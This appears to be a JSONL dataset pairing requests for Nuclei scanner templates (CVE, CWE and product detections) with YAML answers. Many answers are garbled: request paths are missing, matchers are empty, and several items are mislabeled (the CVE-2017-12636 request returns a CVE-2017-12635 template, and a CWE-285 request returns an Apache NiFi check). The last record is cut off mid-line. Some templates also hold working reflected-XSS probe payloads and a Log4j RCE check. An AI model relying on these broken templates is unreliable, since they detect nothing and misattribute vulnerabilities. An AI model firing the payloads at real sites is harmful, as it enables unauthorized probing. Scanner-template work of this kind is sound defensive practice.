+{"instruction": "Generate a Nuclei template for: PowerStar Malware Hash - Detect", "input": "Title: PowerStar Malware Hash - Detect\nSummary: PowerStar Malware Hash - Detect. Detects the batch script used to persist PowerStar via Startup.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: powerstar-malware-hash\n\ninfo:\n name: PowerStar Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detects the batch script used to persist PowerStar via Startup.\n tags: malware,charmingkitten\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "powerstar-malware-hash"}
+{"instruction": "Generate a Nuclei template for: All 404 Redirect to Homepage Detection", "input": "Title: All 404 Redirect to Homepage Detection\nSummary: All 404 Redirect to Homepage Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-all-404-redirect-to-homepage\n\ninfo:\n name: All 404 Redirect to Homepage Detection\n author: ricardomaia\n severity: info\n description: All 404 Redirect to Homepage Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-all-404-redirect-to-homepage"}
+{"instruction": "Generate a Nuclei template for CVE-2022-43017", "input": "Title: Cross-Site Scripting (XSS) in opencats opencats\nSummary: OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: opencats opencats\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-43017\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,xss,opencats,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"CATS=\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-43017"}
+{"instruction": "Generate a Nuclei template for CVE-2024-43360", "input": "Title: SQL Injection in zoneminder zoneminder\nSummary: ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: zoneminder zoneminder\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-43360\n\ninfo:\n name: ZoneMinder - SQL Injection\n author: s4e-io\n severity: critical\n description: ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n tags: cve,cve2024,zoneminder,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-43360"}
+{"instruction": "Generate a Nuclei template for: mosparo Exposed Installation", "input": "Title: mosparo Exposed Installation\nSummary: mosparo Exposed Installation. mosparo is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: mosparo-install\n\ninfo:\n name: mosparo Exposed Installation\n author: DhiyaneshDK\n severity: high\n description: mosparo is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,mosparo,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup/\" \n matchers:\n - type: word\n words:\n - \"Setup - mosparo\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "mosparo-install"}
+{"instruction": "Generate a Nuclei template for: Madness DDOS Malware - Detect", "input": "Title: Madness DDOS Malware - Detect\nSummary: Madness DDOS Malware - Detect. Tags: malware, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: madness-malware\n\ninfo:\n name: Madness DDOS Malware - Detect\n author: daffainfo\n severity: info\n description: Madness DDOS Malware - Detect\n tags: malware,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "madness-malware"}
+{"instruction": "Generate a Nuclei template to detect Improper Authorization", "input": "Title: Improper Authorization (CWE-285)\nSummary: The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. \n When access control checks are not applied consistently - or not at all - users are able to acce\nVulnerability Type: Improper Authorization\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: apache-nifi-unauth\n\ninfo:\n name: Apache NiFi - Unauthenticated Access\n author: pwnhxl\n severity: high\n description: Apache NiFi server was able to be accessed because no authentication was required.\n tags: misconfig,apache,nifi,unauth,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nifi-api/access/config\" \n matchers:\n - type: word\n words:\n - \"\"supportsLogin\":false}\" \n part: body\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-285"}
+{"instruction": "Generate a Nuclei template for: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect", "input": "Title: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect\nSummary: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect. Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: phoenix-contact-charx-api\n\ninfo:\n name: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API - Detect\n author: inokii\n severity: info\n description: Phoenix Contact CHARX SEC-3XXX AC Charging Controller REST API was detected.\n tags: phoenix-contact,charx,ics,api,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1.0/web/retained-data\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "phoenix-contact-charx-api"}
+{"instruction": "Generate a Nuclei template for CVE-2021-3287", "input": "Title: Deserialization of Untrusted Data in zohocorp manageengine_opmanager\nSummary: Zoho ManageEngine OpManager before 12.5.329 allows unauthenticated Remote Code Execution due to a general bypass in the deserialization class.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: zohocorp manageengine_opmanager\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-3287\n\ninfo:\n name: Zoho ManageEngine OpManager < 12.5.329 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: Zoho ManageEngine OpManager before 12.5.329 contains a remote code execution caused by a general bypass in the deserialization class, letting unauthenticated attackers execute arbitrary code, exploit requires no authentication\n tags: cve,cve2021,deserialization,rce,opmanager,passive,vkev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2021-3287"}
+{"instruction": "Generate a Nuclei template for CVE-2017-12636", "input": "Title: OS Command Injection in apache couchdb\nSummary: CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.\nVulnerability Type: OS Command Injection\nSeverity: high\nAffected Products: apache couchdb\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-12635\n\ninfo:\n name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation\n author: pikpikcu\n severity: critical\n description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.\n tags: cve2017,cve,couchdb,apache,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"application/json\" \n - \"Location:\" \n part: header\n - type: word\n words:\n - \"org.couchdb.user:poc\" \n - \"conflict\" \n - \"Document update conflict\" \n part: body\n - type: status\n status:\n - 201", "category": "cve", "severity": "high", "id": "CVE-2017-12636"}
+{"instruction": "Generate a Nuclei template for: Python Scanner", "input": "Title: Python Scanner\nSummary: Python Scanner. Indicators for dangerous Python functions\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: python-scanner\n\ninfo:\n name: Python Scanner\n author: majidmc2\n severity: info\n description: Indicators for dangerous Python functions\n tags: python,file,sast\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "python-scanner"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: zabbix-error\n\ninfo:\n name: Zabbix Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: Zabbix panel was detected.\n tags: zabbix,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Warning [refreshed every 30 sec.]\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2020-29395", "input": "Title: Cross-Site Scripting (XSS) in myeventon eventon\nSummary: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: myeventon eventon\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-29395\n\ninfo:\n name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.\n tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/plugins/eventON/\" \n - method: GET\n path:\n - \"{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "evlink-panel"}
+{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: hjtcloud-arbitrary-file-read\n\ninfo:\n name: HJTcloud - Local File Inclusion\n author: pikpikcu\n severity: high\n description: HJTcloud is vulnerable to local file inclusion.\n tags: hjtcloud,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"}
+{"instruction": "Generate a Nuclei template for: ErenSoft - SQL Injection", "input": "Title: ErenSoft - SQL Injection\nSummary: ErenSoft - SQL Injection. SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: erensoft-sqli\n\ninfo:\n name: ErenSoft - SQL Injection\n author: r3Y3r53\n severity: high\n description: SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.\n tags: sqli,unauth,erensoft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: word\n words:\n - \"class=\"entry-title\"\"", "category": "generic", "severity": "high", "id": "erensoft-sqli"}
+{"instruction": "Generate a Nuclei template for CVE-2021-24364", "input": "Title: Cross-Site Scripting (XSS) in tielabs jannah\nSummary: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: tielabs jannah\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24364\n\ninfo:\n name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/themes/jannah/assets/\" \n - \"attachment-jannah-image-\" \n condition: or\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24364"}
+{"instruction": "Generate a Nuclei template for CVE-2023-3846", "input": "Title: Cross-Site Scripting (XSS) in moosocial moodating\nSummary: A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235197 was assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected Products: moosocial moodating\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-3846\n\ninfo:\n name: MooDating 1.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.\n tags: cve2023,cve,packetstorm,xss,moodating,moosocial,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "low", "id": "CVE-2023-3846"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: wuzhicms-detect\n\ninfo:\n name: Wuzhicms Detected\n author: pikpikcu\n severity: info\n description: Wuzhicms was detected.\n tags: tech,wuzhicms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Powered by wuzhicms\" \n - \"\u4e94\u6307CMS\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: seneporno\n\ninfo:\n name: Seneporno User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Seneporno user name information check was conducted.\n tags: osint,osint-porn,seneporno,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://seneporno.com/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Dernier Login\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: trakt\n\ninfo:\n name: Trakt User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Trakt user name information check was conducted.\n tags: osint,osint-video,trakt,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://trakt.tv/users/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"s profile - Trakt\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Macshell C2 JARM - Detect", "input": "Title: Macshell C2 JARM - Detect\nSummary: Macshell C2 JARM - Detect. MacShellSwift is a proof of concept MacOS post-exploitation tool written in Swift using encrypted sockets. This tool has been tested both pre and post-Catalina. I rewrote a prior tool of mine MacShell (one of my repos) and changed the client to Swift instead of python. This tool consists of two parts: a server script and a client binary. I wrote this tool to help blue teamers proactively guage detections against macOS post-exploitation methods that use macOS internal c\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: macshell-c2-jarm\n\ninfo:\n name: Macshell C2 JARM - Detect\n author: pussycat0x\n severity: info\n description: MacShellSwift is a proof of concept MacOS post-exploitation tool written in Swift using encrypted sockets. This tool has been tested both pre and post-Catalina. I rewrote a prior tool of mine MacShell (one of my repos) and changed the client to Swift instead of python. This tool consists of two parts: a server script and a client binary. I wrote this tool to help blue teamers proactively guage detections against macOS post-exploitation methods that use macOS internal calls. Red teams can also find this of use for getting ideas around using Swift for macOS post-exploitation\n tags: jarm,network,c2,ir,osint,cti,macshell,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "macshell-c2-jarm"}
+{"instruction": "Generate a Nuclei template for CVE-2024-2771", "input": "Title: Missing Authorization in fluentforms contact_form\nSummary: The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.\nVulnerability Type: Missing Authorization\nSeverity: critical\nAffected Products: fluentforms contact_form\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-2771\n\ninfo:\n name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation\n author: Sourabh-Sahu\n severity: critical\n description: The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.\n tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-2771"}
+{"instruction": "Generate a Nuclei template for CVE-2022-1329", "input": "Title: Unrestricted File Upload in elementor website_builder\nSummary: The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2.\nVulnerability Type: Unrestricted File Upload\nSeverity: high\nAffected Products: elementor website_builder\nIndicators: unauthorized", "output": "id: CVE-2022-1329\n\ninfo:\n name: Elementor Website Builder - Remote Code Execution\n author: theamanrawat\n severity: high\n description: The Elementor Website Builder plugin for WordPress versions 3.6.0 to 3.6.2 are vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file. This makes it possible for attackers to modify site data and upload malicious files which can be used to obtain remote code execution.\n tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"5f9bc5edd71c78284dabe630df8cd71d\" \n part: body_4", "category": "cve", "severity": "high", "id": "CVE-2022-1329"}
+{"instruction": "Generate a Nuclei template for: Strapi CMS detect", "input": "Title: Strapi CMS detect\nSummary: Strapi CMS detect. Open source Node.js Headless CMS to easily build customisable APIs\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: strapi-cms-detect\n\ninfo:\n name: Strapi CMS detect\n author: cyllective,daffainfo,idealphase\n severity: info\n description: Open source Node.js Headless CMS to easily build customisable APIs\n tags: tech,strapi,cms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/init\" \n matchers:\n - type: word\n words:\n - \"\"data\"\" \n - \"\"uuid\"\" \n - \"\"hasAdmin\"\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "strapi-cms-detect"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: netsparker-panel\n\ninfo:\n name: Netsparker Login Panel - Detect\n author: pussycat0x\n severity: info\n description: Netsparker login panel was detected.\n tags: panel,netsparker,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/account/signin?ReturnUrl=%2f\" \n matchers:\n - type: word\n words:\n - \"Netsparker Ltd\" \n - \"Netsparker Enterprise\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Wpdm-Cache Session", "input": "Title: Wpdm-Cache Session\nSummary: Wpdm-Cache Session. Leaked session of Wpdm Cache wordpress plugin.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: wpdm-cache-session\n\ninfo:\n name: Wpdm-Cache Session\n author: dhiyaneshDk\n severity: medium\n description: Leaked session of Wpdm Cache wordpress plugin.\n tags: wordpress,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/uploads/wpdm-cache/\" \n matchers:\n - type: word\n words:\n - \"Index of /\" \n - \".txt\" \n - \"wpdm-cache\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "wpdm-cache-session"}
+{"instruction": "Generate a Nuclei template for CVE-2021-44228", "input": "Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others\nSummary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware\nIndicators: error, vulnerability detected", "output": "id: opennms-log4j-rce\n\ninfo:\n name: OpenNMS - JNDI Remote Code Execution (Apache Log4j)\n author: johnk3r\n severity: critical\n description: OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2021-44228"}
+{"instruction": "Generate a Nuclei template for: Google Cloud Functions Using Default Service Account", "input": "Title: Google Cloud Functions Using Default Service Account\nSummary: Google Cloud Functions Using Default Service Account. Ensure that your Google Cloud functions are configured to use user-managed service accounts instead of the default service account managed by Google Cloud in order to follow the Principle of Least Privilege (POLP) and enhance the security posture of your functions.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcp-func-default-svc-acc\n\ninfo:\n name: Google Cloud Functions Using Default Service Account\n author: princechaddha\n severity: medium\n description: Ensure that your Google Cloud functions are configured to use user-managed service accounts instead of the default service account managed by Google Cloud in order to follow the Principle of Least Privilege (POLP) and enhance the security posture of your functions.\n tags: cloud,devops,gcp,gcloud,google-cloud-functions,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcp-func-default-svc-acc"}
+{"instruction": "Generate a Nuclei template for CVE-2022-31847", "input": "Title: Vulnerability (CWE-425) in wavlink wn579x3_firmware\nSummary: A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.\nVulnerability Type: Vulnerability (CWE-425)\nSeverity: high\nAffected Products: wavlink wn579x3_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-31847\n\ninfo:\n name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure\n author: arafatansari\n severity: high\n description: WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,wavlink,exposure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\" \n matchers:\n - type: word\n words:\n - \"Login=\" \n - \"Password=\" \n - \"Model=\" \n - \"AuthMode=\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-31847"}
+{"instruction": "Generate a Nuclei template for CVE-2020-24312", "input": "Title: Vulnerability (CWE-552) in filemanagerpro file_manager\nSummary: mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: high\nAffected Products: filemanagerpro file_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-24312\n\ninfo:\n name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure\n author: x1m_martijn\n severity: high\n description: mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.\n tags: cve,cve2020,wordpress,backups,plugin,webdesi9,vuln\n\nhttp:\n - method: GET\n path:\n - 